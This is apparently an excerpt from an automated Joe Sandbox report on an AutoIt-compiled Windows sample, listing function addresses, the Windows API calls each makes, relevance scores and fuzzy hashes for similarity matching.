Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 30ee4d228a1ae4678946995ff178f5dd56dd3e5b060890e01db114e46cf963b9
Instruction ID: 33b62a31fe88cd7fe3b17deb4c75190d75dedf44d0e014c91f565ae0d61fec44
Opcode Fuzzy Hash: 30ee4d228a1ae4678946995ff178f5dd56dd3e5b060890e01db114e46cf963b9
Instruction Fuzzy Hash: 40310D71911119BFDB259F94EC89EFFB7BCEF18300F0005B9E505A3151EA749E869BA0

Function 00B262CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B262EC
GetWindowLongW.USER32(014B60A0,000000F0), ref: 00B2631F
GetWindowLongW.USER32(014B60A0,000000F0), ref: 00B26354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B26386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B263B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00B263C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B263DB

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 616cad1d50c139d4a9570a636a257512653fb8a238f4919b7b948363bffda2b6
Instruction ID: 6d74f52a505e0b8fb98fce105177d7067914c18e8ef0a86f1b5476c215bb13bd
Opcode Fuzzy Hash: 616cad1d50c139d4a9570a636a257512653fb8a238f4919b7b948363bffda2b6
Instruction Fuzzy Hash: 4B311130640265AFDB21CF18EC84F6937E1FB8A714F1901A8F9499F2B2CB71A851DB95

Function 00AFDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFDB54
SysAllocString.OLEAUT32(00000000), ref: 00AFDB57
SysAllocString.OLEAUT32(?), ref: 00AFDB75
SysFreeString.OLEAUT32(?), ref: 00AFDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00AFDBA3
SysAllocString.OLEAUT32(?), ref: 00AFDBB1

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: dfb7fa45a6790a4f682c473617aa39a8d7de0288082874550693cfcfc80e6ffe
Instruction ID: 7e95f54336d2774804254c7346cf9530c0273c5e09e9e41e45d4f0ddde7273f6
Opcode Fuzzy Hash: dfb7fa45a6790a4f682c473617aa39a8d7de0288082874550693cfcfc80e6ffe
Instruction Fuzzy Hash: BC21923660021EAFDF11EFE8DC88DBB73ADEB09360B018579FA14DB250DA749C418760

Function 00B16173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B17DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B161C6
WSAGetLastError.WSOCK32(00000000), ref: 00B161D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B1620E
connect.WSOCK32(00000000,?,00000010), ref: 00B16217
WSAGetLastError.WSOCK32 ref: 00B16221
closesocket.WSOCK32(00000000), ref: 00B1624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B16263

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 5f6166e87ff207fdd36c9553b9f2102582e4eaeb323f4ae4e78d8cc32e43ad12
Instruction ID: e300836170da4d6e886631008df8c46fa2c22d1458bf02f4b441296ef8b793d1
Opcode Fuzzy Hash: 5f6166e87ff207fdd36c9553b9f2102582e4eaeb323f4ae4e78d8cc32e43ad12
Instruction Fuzzy Hash: D1319E31600108ABDF20AF64CC85BFA7BFDEF45720F4440A9F905EB291DB74AC458BA1

Function 00AFF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00AFF671
__wcsnicmp.LIBCMT ref: 00AFF692
__wcsnicmp.LIBCMT ref: 00AFF6AC

Strings

#notrayicon, xrefs: 00AFF669
#requireadmin, xrefs: 00AFF68C
#OnAutoItStartRegister, xrefs: 00AFF6A6

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: ece03846bfa891f89fca0e0aca154fa969a90a2fd8d8fe56c75c4bfbc9f9b543
Instruction ID: c0d2883d2b0f6d57bb766317108915bb8c4a02eda0b01f0450a0e3ffdafcf452
Opcode Fuzzy Hash: ece03846bfa891f89fca0e0aca154fa969a90a2fd8d8fe56c75c4bfbc9f9b543
Instruction Fuzzy Hash: 832146722042556ED620FB74AD03FBBB3E8EF55340F15403AFA46C71A1EB909D41C395

Function 00AFDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFDC2F
SysAllocString.OLEAUT32(00000000), ref: 00AFDC32
SysAllocString.OLEAUT32 ref: 00AFDC53
SysFreeString.OLEAUT32 ref: 00AFDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00AFDC76
SysAllocString.OLEAUT32(?), ref: 00AFDC84

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7ff8159ae91ab0c8c23c4fd4f7d6db9d062f8cb4400ad82d0dad9beba8e7cdce
Instruction ID: 31e065ace8e9f1dc5fd0231f89013e79ce16706fed396a1d5e965e2885a73752
Opcode Fuzzy Hash: 7ff8159ae91ab0c8c23c4fd4f7d6db9d062f8cb4400ad82d0dad9beba8e7cdce
Instruction Fuzzy Hash: 99216035604209AF9B21AFF8DC89DBB77ADEB09360B108135FA14DB260DAB4DC42C764

Function 00B275CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B27632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B2763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B2764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B27659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B27665

Strings

Msctls_Progress32, xrefs: 00B27603

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 69ab265506c7617df9b80b18c1c383f43133bf5d33785f17924464da2674c988
Instruction ID: b57ddffe1b61278e29847fff3515fbcbfa679272279638c3247ca6986be9d5af
Opcode Fuzzy Hash: 69ab265506c7617df9b80b18c1c383f43133bf5d33785f17924464da2674c988
Instruction Fuzzy Hash: 4811B6B1150129BFEF119F64DC85EE77F6DEF08798F014114BA48A60A0CB729C21DBA4

Function 00AC406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AC3F85), ref: 00AC4085
GetProcAddress.KERNEL32(00000000), ref: 00AC408C
EncodePointer.KERNEL32(00000000), ref: 00AC4097
DecodePointer.KERNEL32(00AC3F85), ref: 00AC40B2

Strings

combase.dll, xrefs: 00AC4080
RoUninitialize, xrefs: 00AC4074

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 5b433d0ff98b4fdad435d09df596d04c4bd153cf6bb993786863848d5be069f3
Instruction ID: 558d7e0cfe71fa2bc1ce92bcb19207c40e345ec9c1dd1799aa2e944fb229c09e
Opcode Fuzzy Hash: 5b433d0ff98b4fdad435d09df596d04c4bd153cf6bb993786863848d5be069f3
Instruction Fuzzy Hash: DFE09270581301EBEA20AF61ED09B553AF4BB09B42F104038F501F30E0CFBA4601CA19

Function 00AA1DB3 Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00AA1DDC
GetWindowRect.USER32(?,?), ref: 00AA1E1D
ScreenToClient.USER32(?,?), ref: 00AA1E45
GetClientRect.USER32(?,?), ref: 00AA1F74
GetWindowRect.USER32(?,?), ref: 00AA1F8D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: d5c6f61766bd274c7c1de5a2a3272ac198019e9e9e47f0edd27fb6ee7c3fae6a
Instruction ID: 8a9d320f1b1f28012cdecad39506a24b37a7c0383e838a143c467dd06e938ad2
Opcode Fuzzy Hash: d5c6f61766bd274c7c1de5a2a3272ac198019e9e9e47f0edd27fb6ee7c3fae6a
Instruction Fuzzy Hash: FCB13C7990024AEFDF10CFA9C5807EEB7B1FF09710F14956AEC599B294EB30A950CB64

Function 00B064B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B0660B
_memmove.LIBCMT ref: 00B06546

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

_memmove.LIBCMT ref: 00B065B9
_memmove.LIBCMT ref: 00B066A0
_memmove.LIBCMT ref: 00B066B9
_memmove.LIBCMT ref: 00B066D5

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: d63078d5572b21b655040641cc4802aeebe501ae5fd08c819fb7e9c2da2d21c2
Instruction ID: 7ba5bef4cebde0c47ae6289ee7d60b7e6bf0a36e0b55bf0537f609058f94d6e6
Opcode Fuzzy Hash: d63078d5572b21b655040641cc4802aeebe501ae5fd08c819fb7e9c2da2d21c2
Instruction Fuzzy Hash: 6B618B3050065A9BCF11EF60CD82EFF3BA9AF0A308F0545A9F8595B2D2DB35AD16CB50

Function 00B201E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00B20E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1FDAD,?,?), ref: 00B20E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B202BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B202FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B20320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B20349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B2038C
RegCloseKey.ADVAPI32(00000000), ref: 00B20399

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 3f862bf42a6fc5f84f6cf81c61bc0c90d1d2b93d5698a2c9c59d358622ec92a2
Instruction ID: 4a74f79325e99ca2ec1620e8e8ea94dd4412e2dcd1f1f9b1b001385c1cfc3947
Opcode Fuzzy Hash: 3f862bf42a6fc5f84f6cf81c61bc0c90d1d2b93d5698a2c9c59d358622ec92a2
Instruction Fuzzy Hash: AB515831118204AFC714EF64D985EAFBBE9FF89314F04496DF5498B2A2DB31E905CB52

Function 00B25799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00B257FB
GetMenuItemCount.USER32(00000000), ref: 00B25832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B2585A
GetMenuItemID.USER32(?,?), ref: 00B258C9
GetSubMenu.USER32(?,?), ref: 00B258D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00B25928

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: c736f0de912e52134e20ba58374a8a6da346740af43b24768b76a3b911eff9e9
Instruction ID: b766e60202e1c7d1dad5ee3488f26add68afc11132a2aa9e50b3a29e4a2bfd6b
Opcode Fuzzy Hash: c736f0de912e52134e20ba58374a8a6da346740af43b24768b76a3b911eff9e9
Instruction Fuzzy Hash: C0513C35E00625EFCF21EF64D945AAEBBF4EF49710F1040A9E855AB351CB74AE418B90

Function 00AFEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AFEF06
VariantClear.OLEAUT32(00000013), ref: 00AFEF78
VariantClear.OLEAUT32(00000000), ref: 00AFEFD3
_memmove.LIBCMT ref: 00AFEFFD
VariantClear.OLEAUT32(?), ref: 00AFF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AFF078

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: be2a792107e96d07dc7b61776b383c1f7727d0457633abf882788fbef51af75b
Instruction ID: 567e38012937fb70f4bedcfa4344f44688f54ecb5e4b0c8f4f21c04e8210d2db
Opcode Fuzzy Hash: be2a792107e96d07dc7b61776b383c1f7727d0457633abf882788fbef51af75b
Instruction Fuzzy Hash: 93514CB5A00209DFDB24DF58C884AAAB7B8FF4C314B158569FA59DB301E735E911CBA0

Function 00B0220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B022A3
IsMenu.USER32(00000000), ref: 00B022C3
CreatePopupMenu.USER32 ref: 00B022F7
GetMenuItemCount.USER32(000000FF), ref: 00B02355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B02386

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: ff865e76b7830dd195404a2eeb62ff61d76eddc623d8d6e31ab5270e871437be
Instruction ID: c22353498250c2bc773c183873e818732d91378fe88db834d6c434cd05224861
Opcode Fuzzy Hash: ff865e76b7830dd195404a2eeb62ff61d76eddc623d8d6e31ab5270e871437be
Instruction Fuzzy Hash: 7A518730A0020AEFDF21CF68C988BAEBFF5EF15314F1482A9E855A72D0D7748908CB55

Function 00AA1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00AA179A
GetWindowRect.USER32(?,?), ref: 00AA17FE
ScreenToClient.USER32(?,?), ref: 00AA181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AA182C
EndPaint.USER32(?,?), ref: 00AA1876

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: f74daa432ced1969bf928229f66a811985a2ca3773112c586e0d7aa6150165a7
Instruction ID: 367d9218fc402d2c5ba4c10988c095c4dcec74392cd59c46f6c8c7dfa884fb9c
Opcode Fuzzy Hash: f74daa432ced1969bf928229f66a811985a2ca3773112c586e0d7aa6150165a7
Instruction Fuzzy Hash: 63419A30504701AFD721DF28CC84BBA7BF8EB4A724F044669F9A58B2E1CB749855DB62

Function 00B2B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00B657B0,00000000,014B60A0,?,?,00B657B0,?,00B2B5A8,?,?), ref: 00B2B712
EnableWindow.USER32(00000000,00000000), ref: 00B2B736
ShowWindow.USER32(00B657B0,00000000,014B60A0,?,?,00B657B0,?,00B2B5A8,?,?), ref: 00B2B796
ShowWindow.USER32(00000000,00000004,?,00B2B5A8,?,?), ref: 00B2B7A8
EnableWindow.USER32(00000000,00000001), ref: 00B2B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B2B7EF

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 0d0869a1e09ab0f4a18b75bd9000c68e480f90b9c7487605965ba289c70c5bf8
Instruction ID: bd62717f9ca1ed3448c4741743d27eeec340c16dbe125f005b78d5f82ced25e6
Opcode Fuzzy Hash: 0d0869a1e09ab0f4a18b75bd9000c68e480f90b9c7487605965ba289c70c5bf8
Instruction Fuzzy Hash: FA415734601261AFDB26CF24E499FA57BE0EB45310F1841F9E94C8F6B2CB31AC56CB51

Function 00B1709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00B14E41,?,?,00000000,00000001), ref: 00B170AC

Part of subcall function 00B139A0: GetWindowRect.USER32(?,?), ref: 00B139B3

GetDesktopWindow.USER32 ref: 00B170D6
GetWindowRect.USER32(00000000), ref: 00B170DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B1710F

Part of subcall function 00B05244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B052BC

GetCursorPos.USER32(?), ref: 00B1713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B17199

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

